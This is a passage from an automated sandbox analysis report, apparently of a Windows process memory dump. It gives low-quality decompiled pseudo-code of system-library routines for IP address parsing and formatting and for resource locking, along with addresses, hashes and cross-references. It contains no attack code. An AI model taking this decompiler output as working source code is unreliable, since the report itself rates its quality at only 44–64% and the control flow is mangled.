							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01E28980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01E1DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01E50CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01E50CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01E506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01E506BA(_t135, _t178) == 0 || E01E50A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01E50CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01E50CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01E506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01E506BA(_t124, _t142) == 0 || E01E50A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x01e50b21
0x01e50b24
0x01e50b27
0x01e50b2a
0x01e50b2d
0x01e50b30
0x01e50b33
0x01e50b36
0x01e50b39
0x01e50b3e
0x01e50c65
0x01e50c68
0x01e50c6a
0x01e50c6f
0x01e7eb42
0x00000000
0x00000000
0x01e7eb48
0x01e7eb48
0x01e50c75
0x01e50c7a
0x01e7eb54
0x00000000
0x00000000
0x00000000
0x01e7eb5a
0x01e50c80
0x01e50c84
0x01e7eb98
0x00000000
0x00000000
0x01e7eba6
0x01e50cb8
0x01e50cba
0x01e50cd3
0x01e50cda
0x01e50ce4
0x01e50ce9
0x00000000
0x01e50cec
0x01e50c8c
0x01e7eb63
0x00000000
0x00000000
0x01e7eb70
0x01e7eb75
0x01e7eb7d
0x00000000
0x00000000
0x01e7eb8c
0x00000000
0x01e7eb8c
0x01e50c96
0x00000000
0x00000000
0x01e50ca2
0x01e50cac
0x01e50cb4
0x00000000
0x00000000
0x01e50b44
0x01e50b47
0x01e50b49
0x00000000
0x00000000
0x01e50b4f
0x01e50b50
0x00000000
0x00000000
0x01e50b56
0x01e50b62
0x01e50b7c
0x01e50bac
0x01e50a0f
0x01e7eaaa
0x00000000
0x01e7eac4
0x01e7eac4
0x01e50bd0
0x01e50bd0
0x01e50bd4
0x01e50bd9
0x00000000
0x00000000
0x01e50bdb
0x01e50be0
0x01e7eb0e
0x01e50a1a
0x00000000
0x01e50a1a
0x01e7eb1a
0x01e7eb1f
0x01e7eb27
0x00000000
0x00000000
0x01e7eb36
0x00000000
0x01e7eb36
0x01e50bea
0x00000000
0x00000000
0x01e50bf6
0x01e50c00
0x01e50c03
0x01e50c0b
0x00000000
0x01e50c0b
0x01e7eaaa
0x00000000
0x01e50a15
0x01e50bb6
0x00000000
0x01e50bc6
0x01e50bc6
0x01e50bcb
0x01e50c15
0x00000000
0x00000000
0x01e50c1d
0x01e50c20
0x01e50c21
0x01e50c24
0x01e50c24
0x01e50c26
0x00000000
0x01e50c26
0x01e50bcd
0x00000000
0x01e50bcd
0x01e50b89
0x01e50b89
0x01e50b90
0x00000000
0x00000000
0x01e50b96
0x00000000
0x01e50b96
0x01e50a04
0x01e50a04
0x01e50b9a
0x01e50b9a
0x01e50b9b
0x01e50b9f
0x00000000
0x00000000
0x00000000
0x01e50ba5
0x01e50ac7
0x01e50aca
0x01e7eacf
0x00000000
0x01e7eade
0x01e7eade
0x01e7eae3
0x00000000
0x00000000
0x01e7eaf3
0x01e7eaf6
0x01e7eaf7
0x01e7eafe
0x01e7eb01
0x00000000
0x01e7eb01
0x01e7eacf
0x01e50ad0
0x01e50ad4
0x00000000
0x00000000
0x01e50ada
0x01e50ae6
0x01e50c34
0x00000000
0x01e50c47
0x01e50c49
0x01e50c4a
0x01e50c4e
0x01e50c51
0x01e50c54
0x01e50c57
0x01e50c5a
0x00000000
0x00000000
0x00000000
0x01e50c60
0x01e50afb
0x01e50afe
0x01e50b02
0x01e50b05
0x01e50b08
0x00000000
0x01e50b08
0x01e50ae6
0x01e50b44
0x01e509f8
0x01e509f8
0x01e509f9
0x00000000
0x00000000
0x01e7eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 01E50BF6
__fassign.LIBCMT ref: 01E50CA2

Strings

:, xrefs: 01E50BA9
:, xrefs: 01E50AC7
., xrefs: 01E50A0C

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: ac06e3f3faeb69b9805372a3cb96f1c66932732f8abd6a90089cc6848acf3396
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 64A18D7190034ADEDFA9CF68C8457BEBBB5AF46308F24A46AFD42A7241D7309A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01E50554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E01E50554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01ef01c0;
									_push(_t144);
									_push(0);
									_t51 = E01E0F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01E54FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01E63F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01E9217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01E63F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01E53915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01ef01c0;
												_push(_t138);
												_push(0);
												_t58 = E01E0F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01E54FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01E63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01E9217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01E63F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01E53915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01E35384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01E0F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01E53915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01E0F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01E53915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01E0F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01E53915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E01E35329(_t110, _t138);
																return E01E353A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x01e5055a
0x01e5055d
0x01e50563
0x01e50566
0x01e505d8
0x01e505e2
0x01e505e5
0x00000000
0x01e505e7
0x01e505e7
0x01e505ea
0x01e505f3
0x01e505f3
0x01e50568
0x01e50568
0x01e50568
0x01e50569
0x01e50569
0x01e50569
0x01e5056b
0x00000000
0x00000000
0x01e7217f
0x01e72183
0x01e7225b
0x01e7225f
0x01e72189
0x01e7218c
0x01e7218f
0x01e72194
0x01e72199
0x01e7219d
0x01e721a0
0x01e721a2
0x01e721ce
0x01e721ce
0x01e721ce
0x01e721d0
0x01e721d6
0x01e721de
0x01e721e2
0x01e721e8
0x01e721e9
0x01e721ec
0x01e721f1
0x01e721f6
0x00000000
0x00000000
0x01e721f8
0x01e721fb
0x01e72206
0x01e7220b
0x01e7220c
0x01e72217
0x01e72226
0x01e7222b
0x01e7222c
0x01e7222f
0x01e72232
0x01e72235
0x01e72235
0x01e7223a
0x01e7223f
0x01e72241
0x01e72243
0x01e72248
0x01e72248
0x01e7224d
0x01e7224f
0x01e72262
0x01e72263
0x01e72268
0x01e72269
0x01e72269
0x01e72269
0x01e7226d
0x00000000
0x00000000
0x01e72276
0x01e72279
0x01e7227e
0x01e72283
0x01e72287
0x01e7228a
0x01e7228d
0x01e7228f
0x01e722bc
0x01e722bc
0x01e722bc
0x01e722be
0x01e722c4
0x01e722cc
0x01e722d0
0x01e722d6
0x01e722d7
0x01e722da
0x01e722df
0x01e722e4
0x00000000
0x00000000
0x01e722e6
0x01e722e9
0x01e722f4
0x01e722f9
0x01e722fa
0x01e72305
0x01e72314
0x01e72319
0x01e7231a
0x01e7231d
0x01e72320
0x01e72323
0x01e72323
0x01e72328
0x01e7232d
0x01e7232f
0x01e72331
0x01e72336
0x01e72336
0x01e7233b
0x01e7233d
0x01e72350
0x01e72351
0x01e72356
0x01e72359
0x01e72359
0x01e7235b
0x01e7235d
0x01e35367
0x01e3536b
0x01e35372
0x00000000
0x00000000
0x00000000
0x00000000
0x01e72363
0x01e72363
0x01e72369
0x01e7236a
0x01e7236c
0x01e72371
0x01e72373
0x00000000
0x01e72379
0x01e72379
0x01e7237a
0x01e7237f
0x01e7237f
0x01e72385
0x01e72386
0x01e72389
0x01e7238e
0x01e72390
0x01e35378
0x01e3537c
0x01e72396
0x01e72396
0x01e72397
0x01e7239c
0x01e723a2
0x01e723a3
0x01e723a6
0x01e723ab
0x01e723ad
0x00000000
0x01e723b3
0x01e723b3
0x01e723b4
0x01e723b9
0x01e723ba
0x01e723ba
0x01e723bc
0x01e723bf
0x00000000
0x00000000
0x01e69153
0x01e69158
0x01e6915a
0x01e6915e
0x01e69160
0x00000000
0x01e69166
0x01e69166
0x01e69171
0x01e69176
0x01e69176
0x00000000
0x01e69160
0x01e723c6
0x01e723d7
0x01e723d7
0x01e723ad
0x01e72390
0x01e72373
0x01e7233f
0x01e7233f
0x00000000
0x01e7233f
0x01e72291
0x01e72291
0x01e72293
0x01e72295
0x01e7229a
0x01e722a1
0x01e722a3
0x01e722a7
0x01e722a9
0x00000000
0x00000000
0x01e722ab
0x01e722ad
0x01e722af
0x00000000
0x00000000
0x00000000
0x01e722af
0x01e722b1
0x01e722b4
0x01e722b4
0x01e722b6
0x01e353be
0x01e353be
0x01e353be
0x01e353c0
0x00000000
0x00000000
0x01e353cb
0x01e353ce
0x01e353d0
0x01e353d4
0x01e353d6
0x00000000
0x01e353d8
0x01e353e3
0x01e353ea
0x01e353ea
0x00000000
0x01e353d6
0x00000000
0x00000000
0x00000000
0x00000000
0x01e722b6
0x00000000
0x01e7228f
0x01e72349
0x01e7234d
0x01e72251
0x01e72251
0x00000000
0x01e72251
0x01e721a4
0x01e721a4
0x01e721a6
0x01e721a8
0x01e721ac
0x01e721b6
0x01e721b8
0x01e721bc
0x01e721be
0x00000000
0x00000000
0x01e721c0
0x01e721c2
0x01e721c4
0x00000000
0x00000000
0x00000000
0x01e721c4
0x01e721c6
0x01e721c6
0x01e721c8
0x00000000
0x00000000
0x00000000
0x00000000
0x01e721c8
0x01e721a2
0x00000000
0x01e72183
0x01e5057b
0x01e5057d
0x01e50581
0x01e50583
0x01e72178
0x00000000
0x01e50589
0x01e5058f
0x01e5058f
0x01e50583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01E72206

Strings

RTL: Re-Waiting, xrefs: 01E7223A, 01E72328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01E7220E
RTL: Resource at %p, xrefs: 01E7221D, 01E7230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01E722FC

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 8d89ee88f3039d4d2e914cebf2d60a8a93e92199b8525c750223116f54146039
Instruction ID: 30cd740d176c00da35c4be95f3d61003bf56190a6481723282bfbc0df4026a82
Opcode Fuzzy Hash: 8d89ee88f3039d4d2e914cebf2d60a8a93e92199b8525c750223116f54146039
Instruction Fuzzy Hash: 1D513D757402536BFB15CA19DC81FAE33AAAF94714F21A219FE48DB3C5E631EC818790

Uniqueness

Uniqueness Score: -1.00%

Function 01E514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01E514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x1ef2088; // 0x76606d50
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01E47707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01E513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01E47707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01E47707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01E12340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01E1E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x01e514c0
0x01e514cb
0x01e514d2
0x01e514d6
0x01e514da
0x01e514de
0x01e514e3
0x01e5157a
0x01e5157a
0x01e514f1
0x01e514f3
0x01e7ea0f
0x00000000
0x01e7ea15
0x00000000
0x01e7ea15
0x01e514f9
0x01e514f9
0x01e514fe
0x01e51504
0x01e7ea1a
0x01e7ea1f
0x01e7ea21
0x01e7ea22
0x01e7ea27
0x01e7ea2a
0x01e7ea2a
0x01e51515
0x01e51517
0x01e5156d
0x01e51572
0x01e51575
0x01e51575
0x01e5151e
0x01e7ea50
0x01e7ea55
0x01e7ea58
0x01e7ea58
0x01e5152e
0x01e51531
0x01e51533
0x00000000
0x01e51535
0x01e51541
0x01e51549
0x01e51549
0x01e51533
0x01e514f3
0x01e51559

APIs

___swprintf_l.LIBCMT ref: 01E7EA22

Part of subcall function 01E513CB: ___swprintf_l.LIBCMT ref: 01E5146B
Part of subcall function 01E513CB: ___swprintf_l.LIBCMT ref: 01E51490

___swprintf_l.LIBCMT ref: 01E5156D

Strings

]:%u, xrefs: 01E7EA47
%%%u, xrefs: 01E51564

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: a5c9e0c2b4656b1c78afcb17a1147e30c178194b125f9c665d02c2a43a28f17b
Instruction ID: 9f7a4e90f0e4d1c2165cc4c7abd5a9c55758e85ff968e5e4859e5ca54c6b195b
Opcode Fuzzy Hash: a5c9e0c2b4656b1c78afcb17a1147e30c178194b125f9c665d02c2a43a28f17b
Instruction Fuzzy Hash: F521D27290021A9BDB61EF58DC44BEE77BCBF14708F886465ED46D3140EB70EA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01E353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01E353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01ef01c0;
									_push(_t92);
									_push(0);
									_t37 = E01E0F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01E54FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01E63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01E9217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
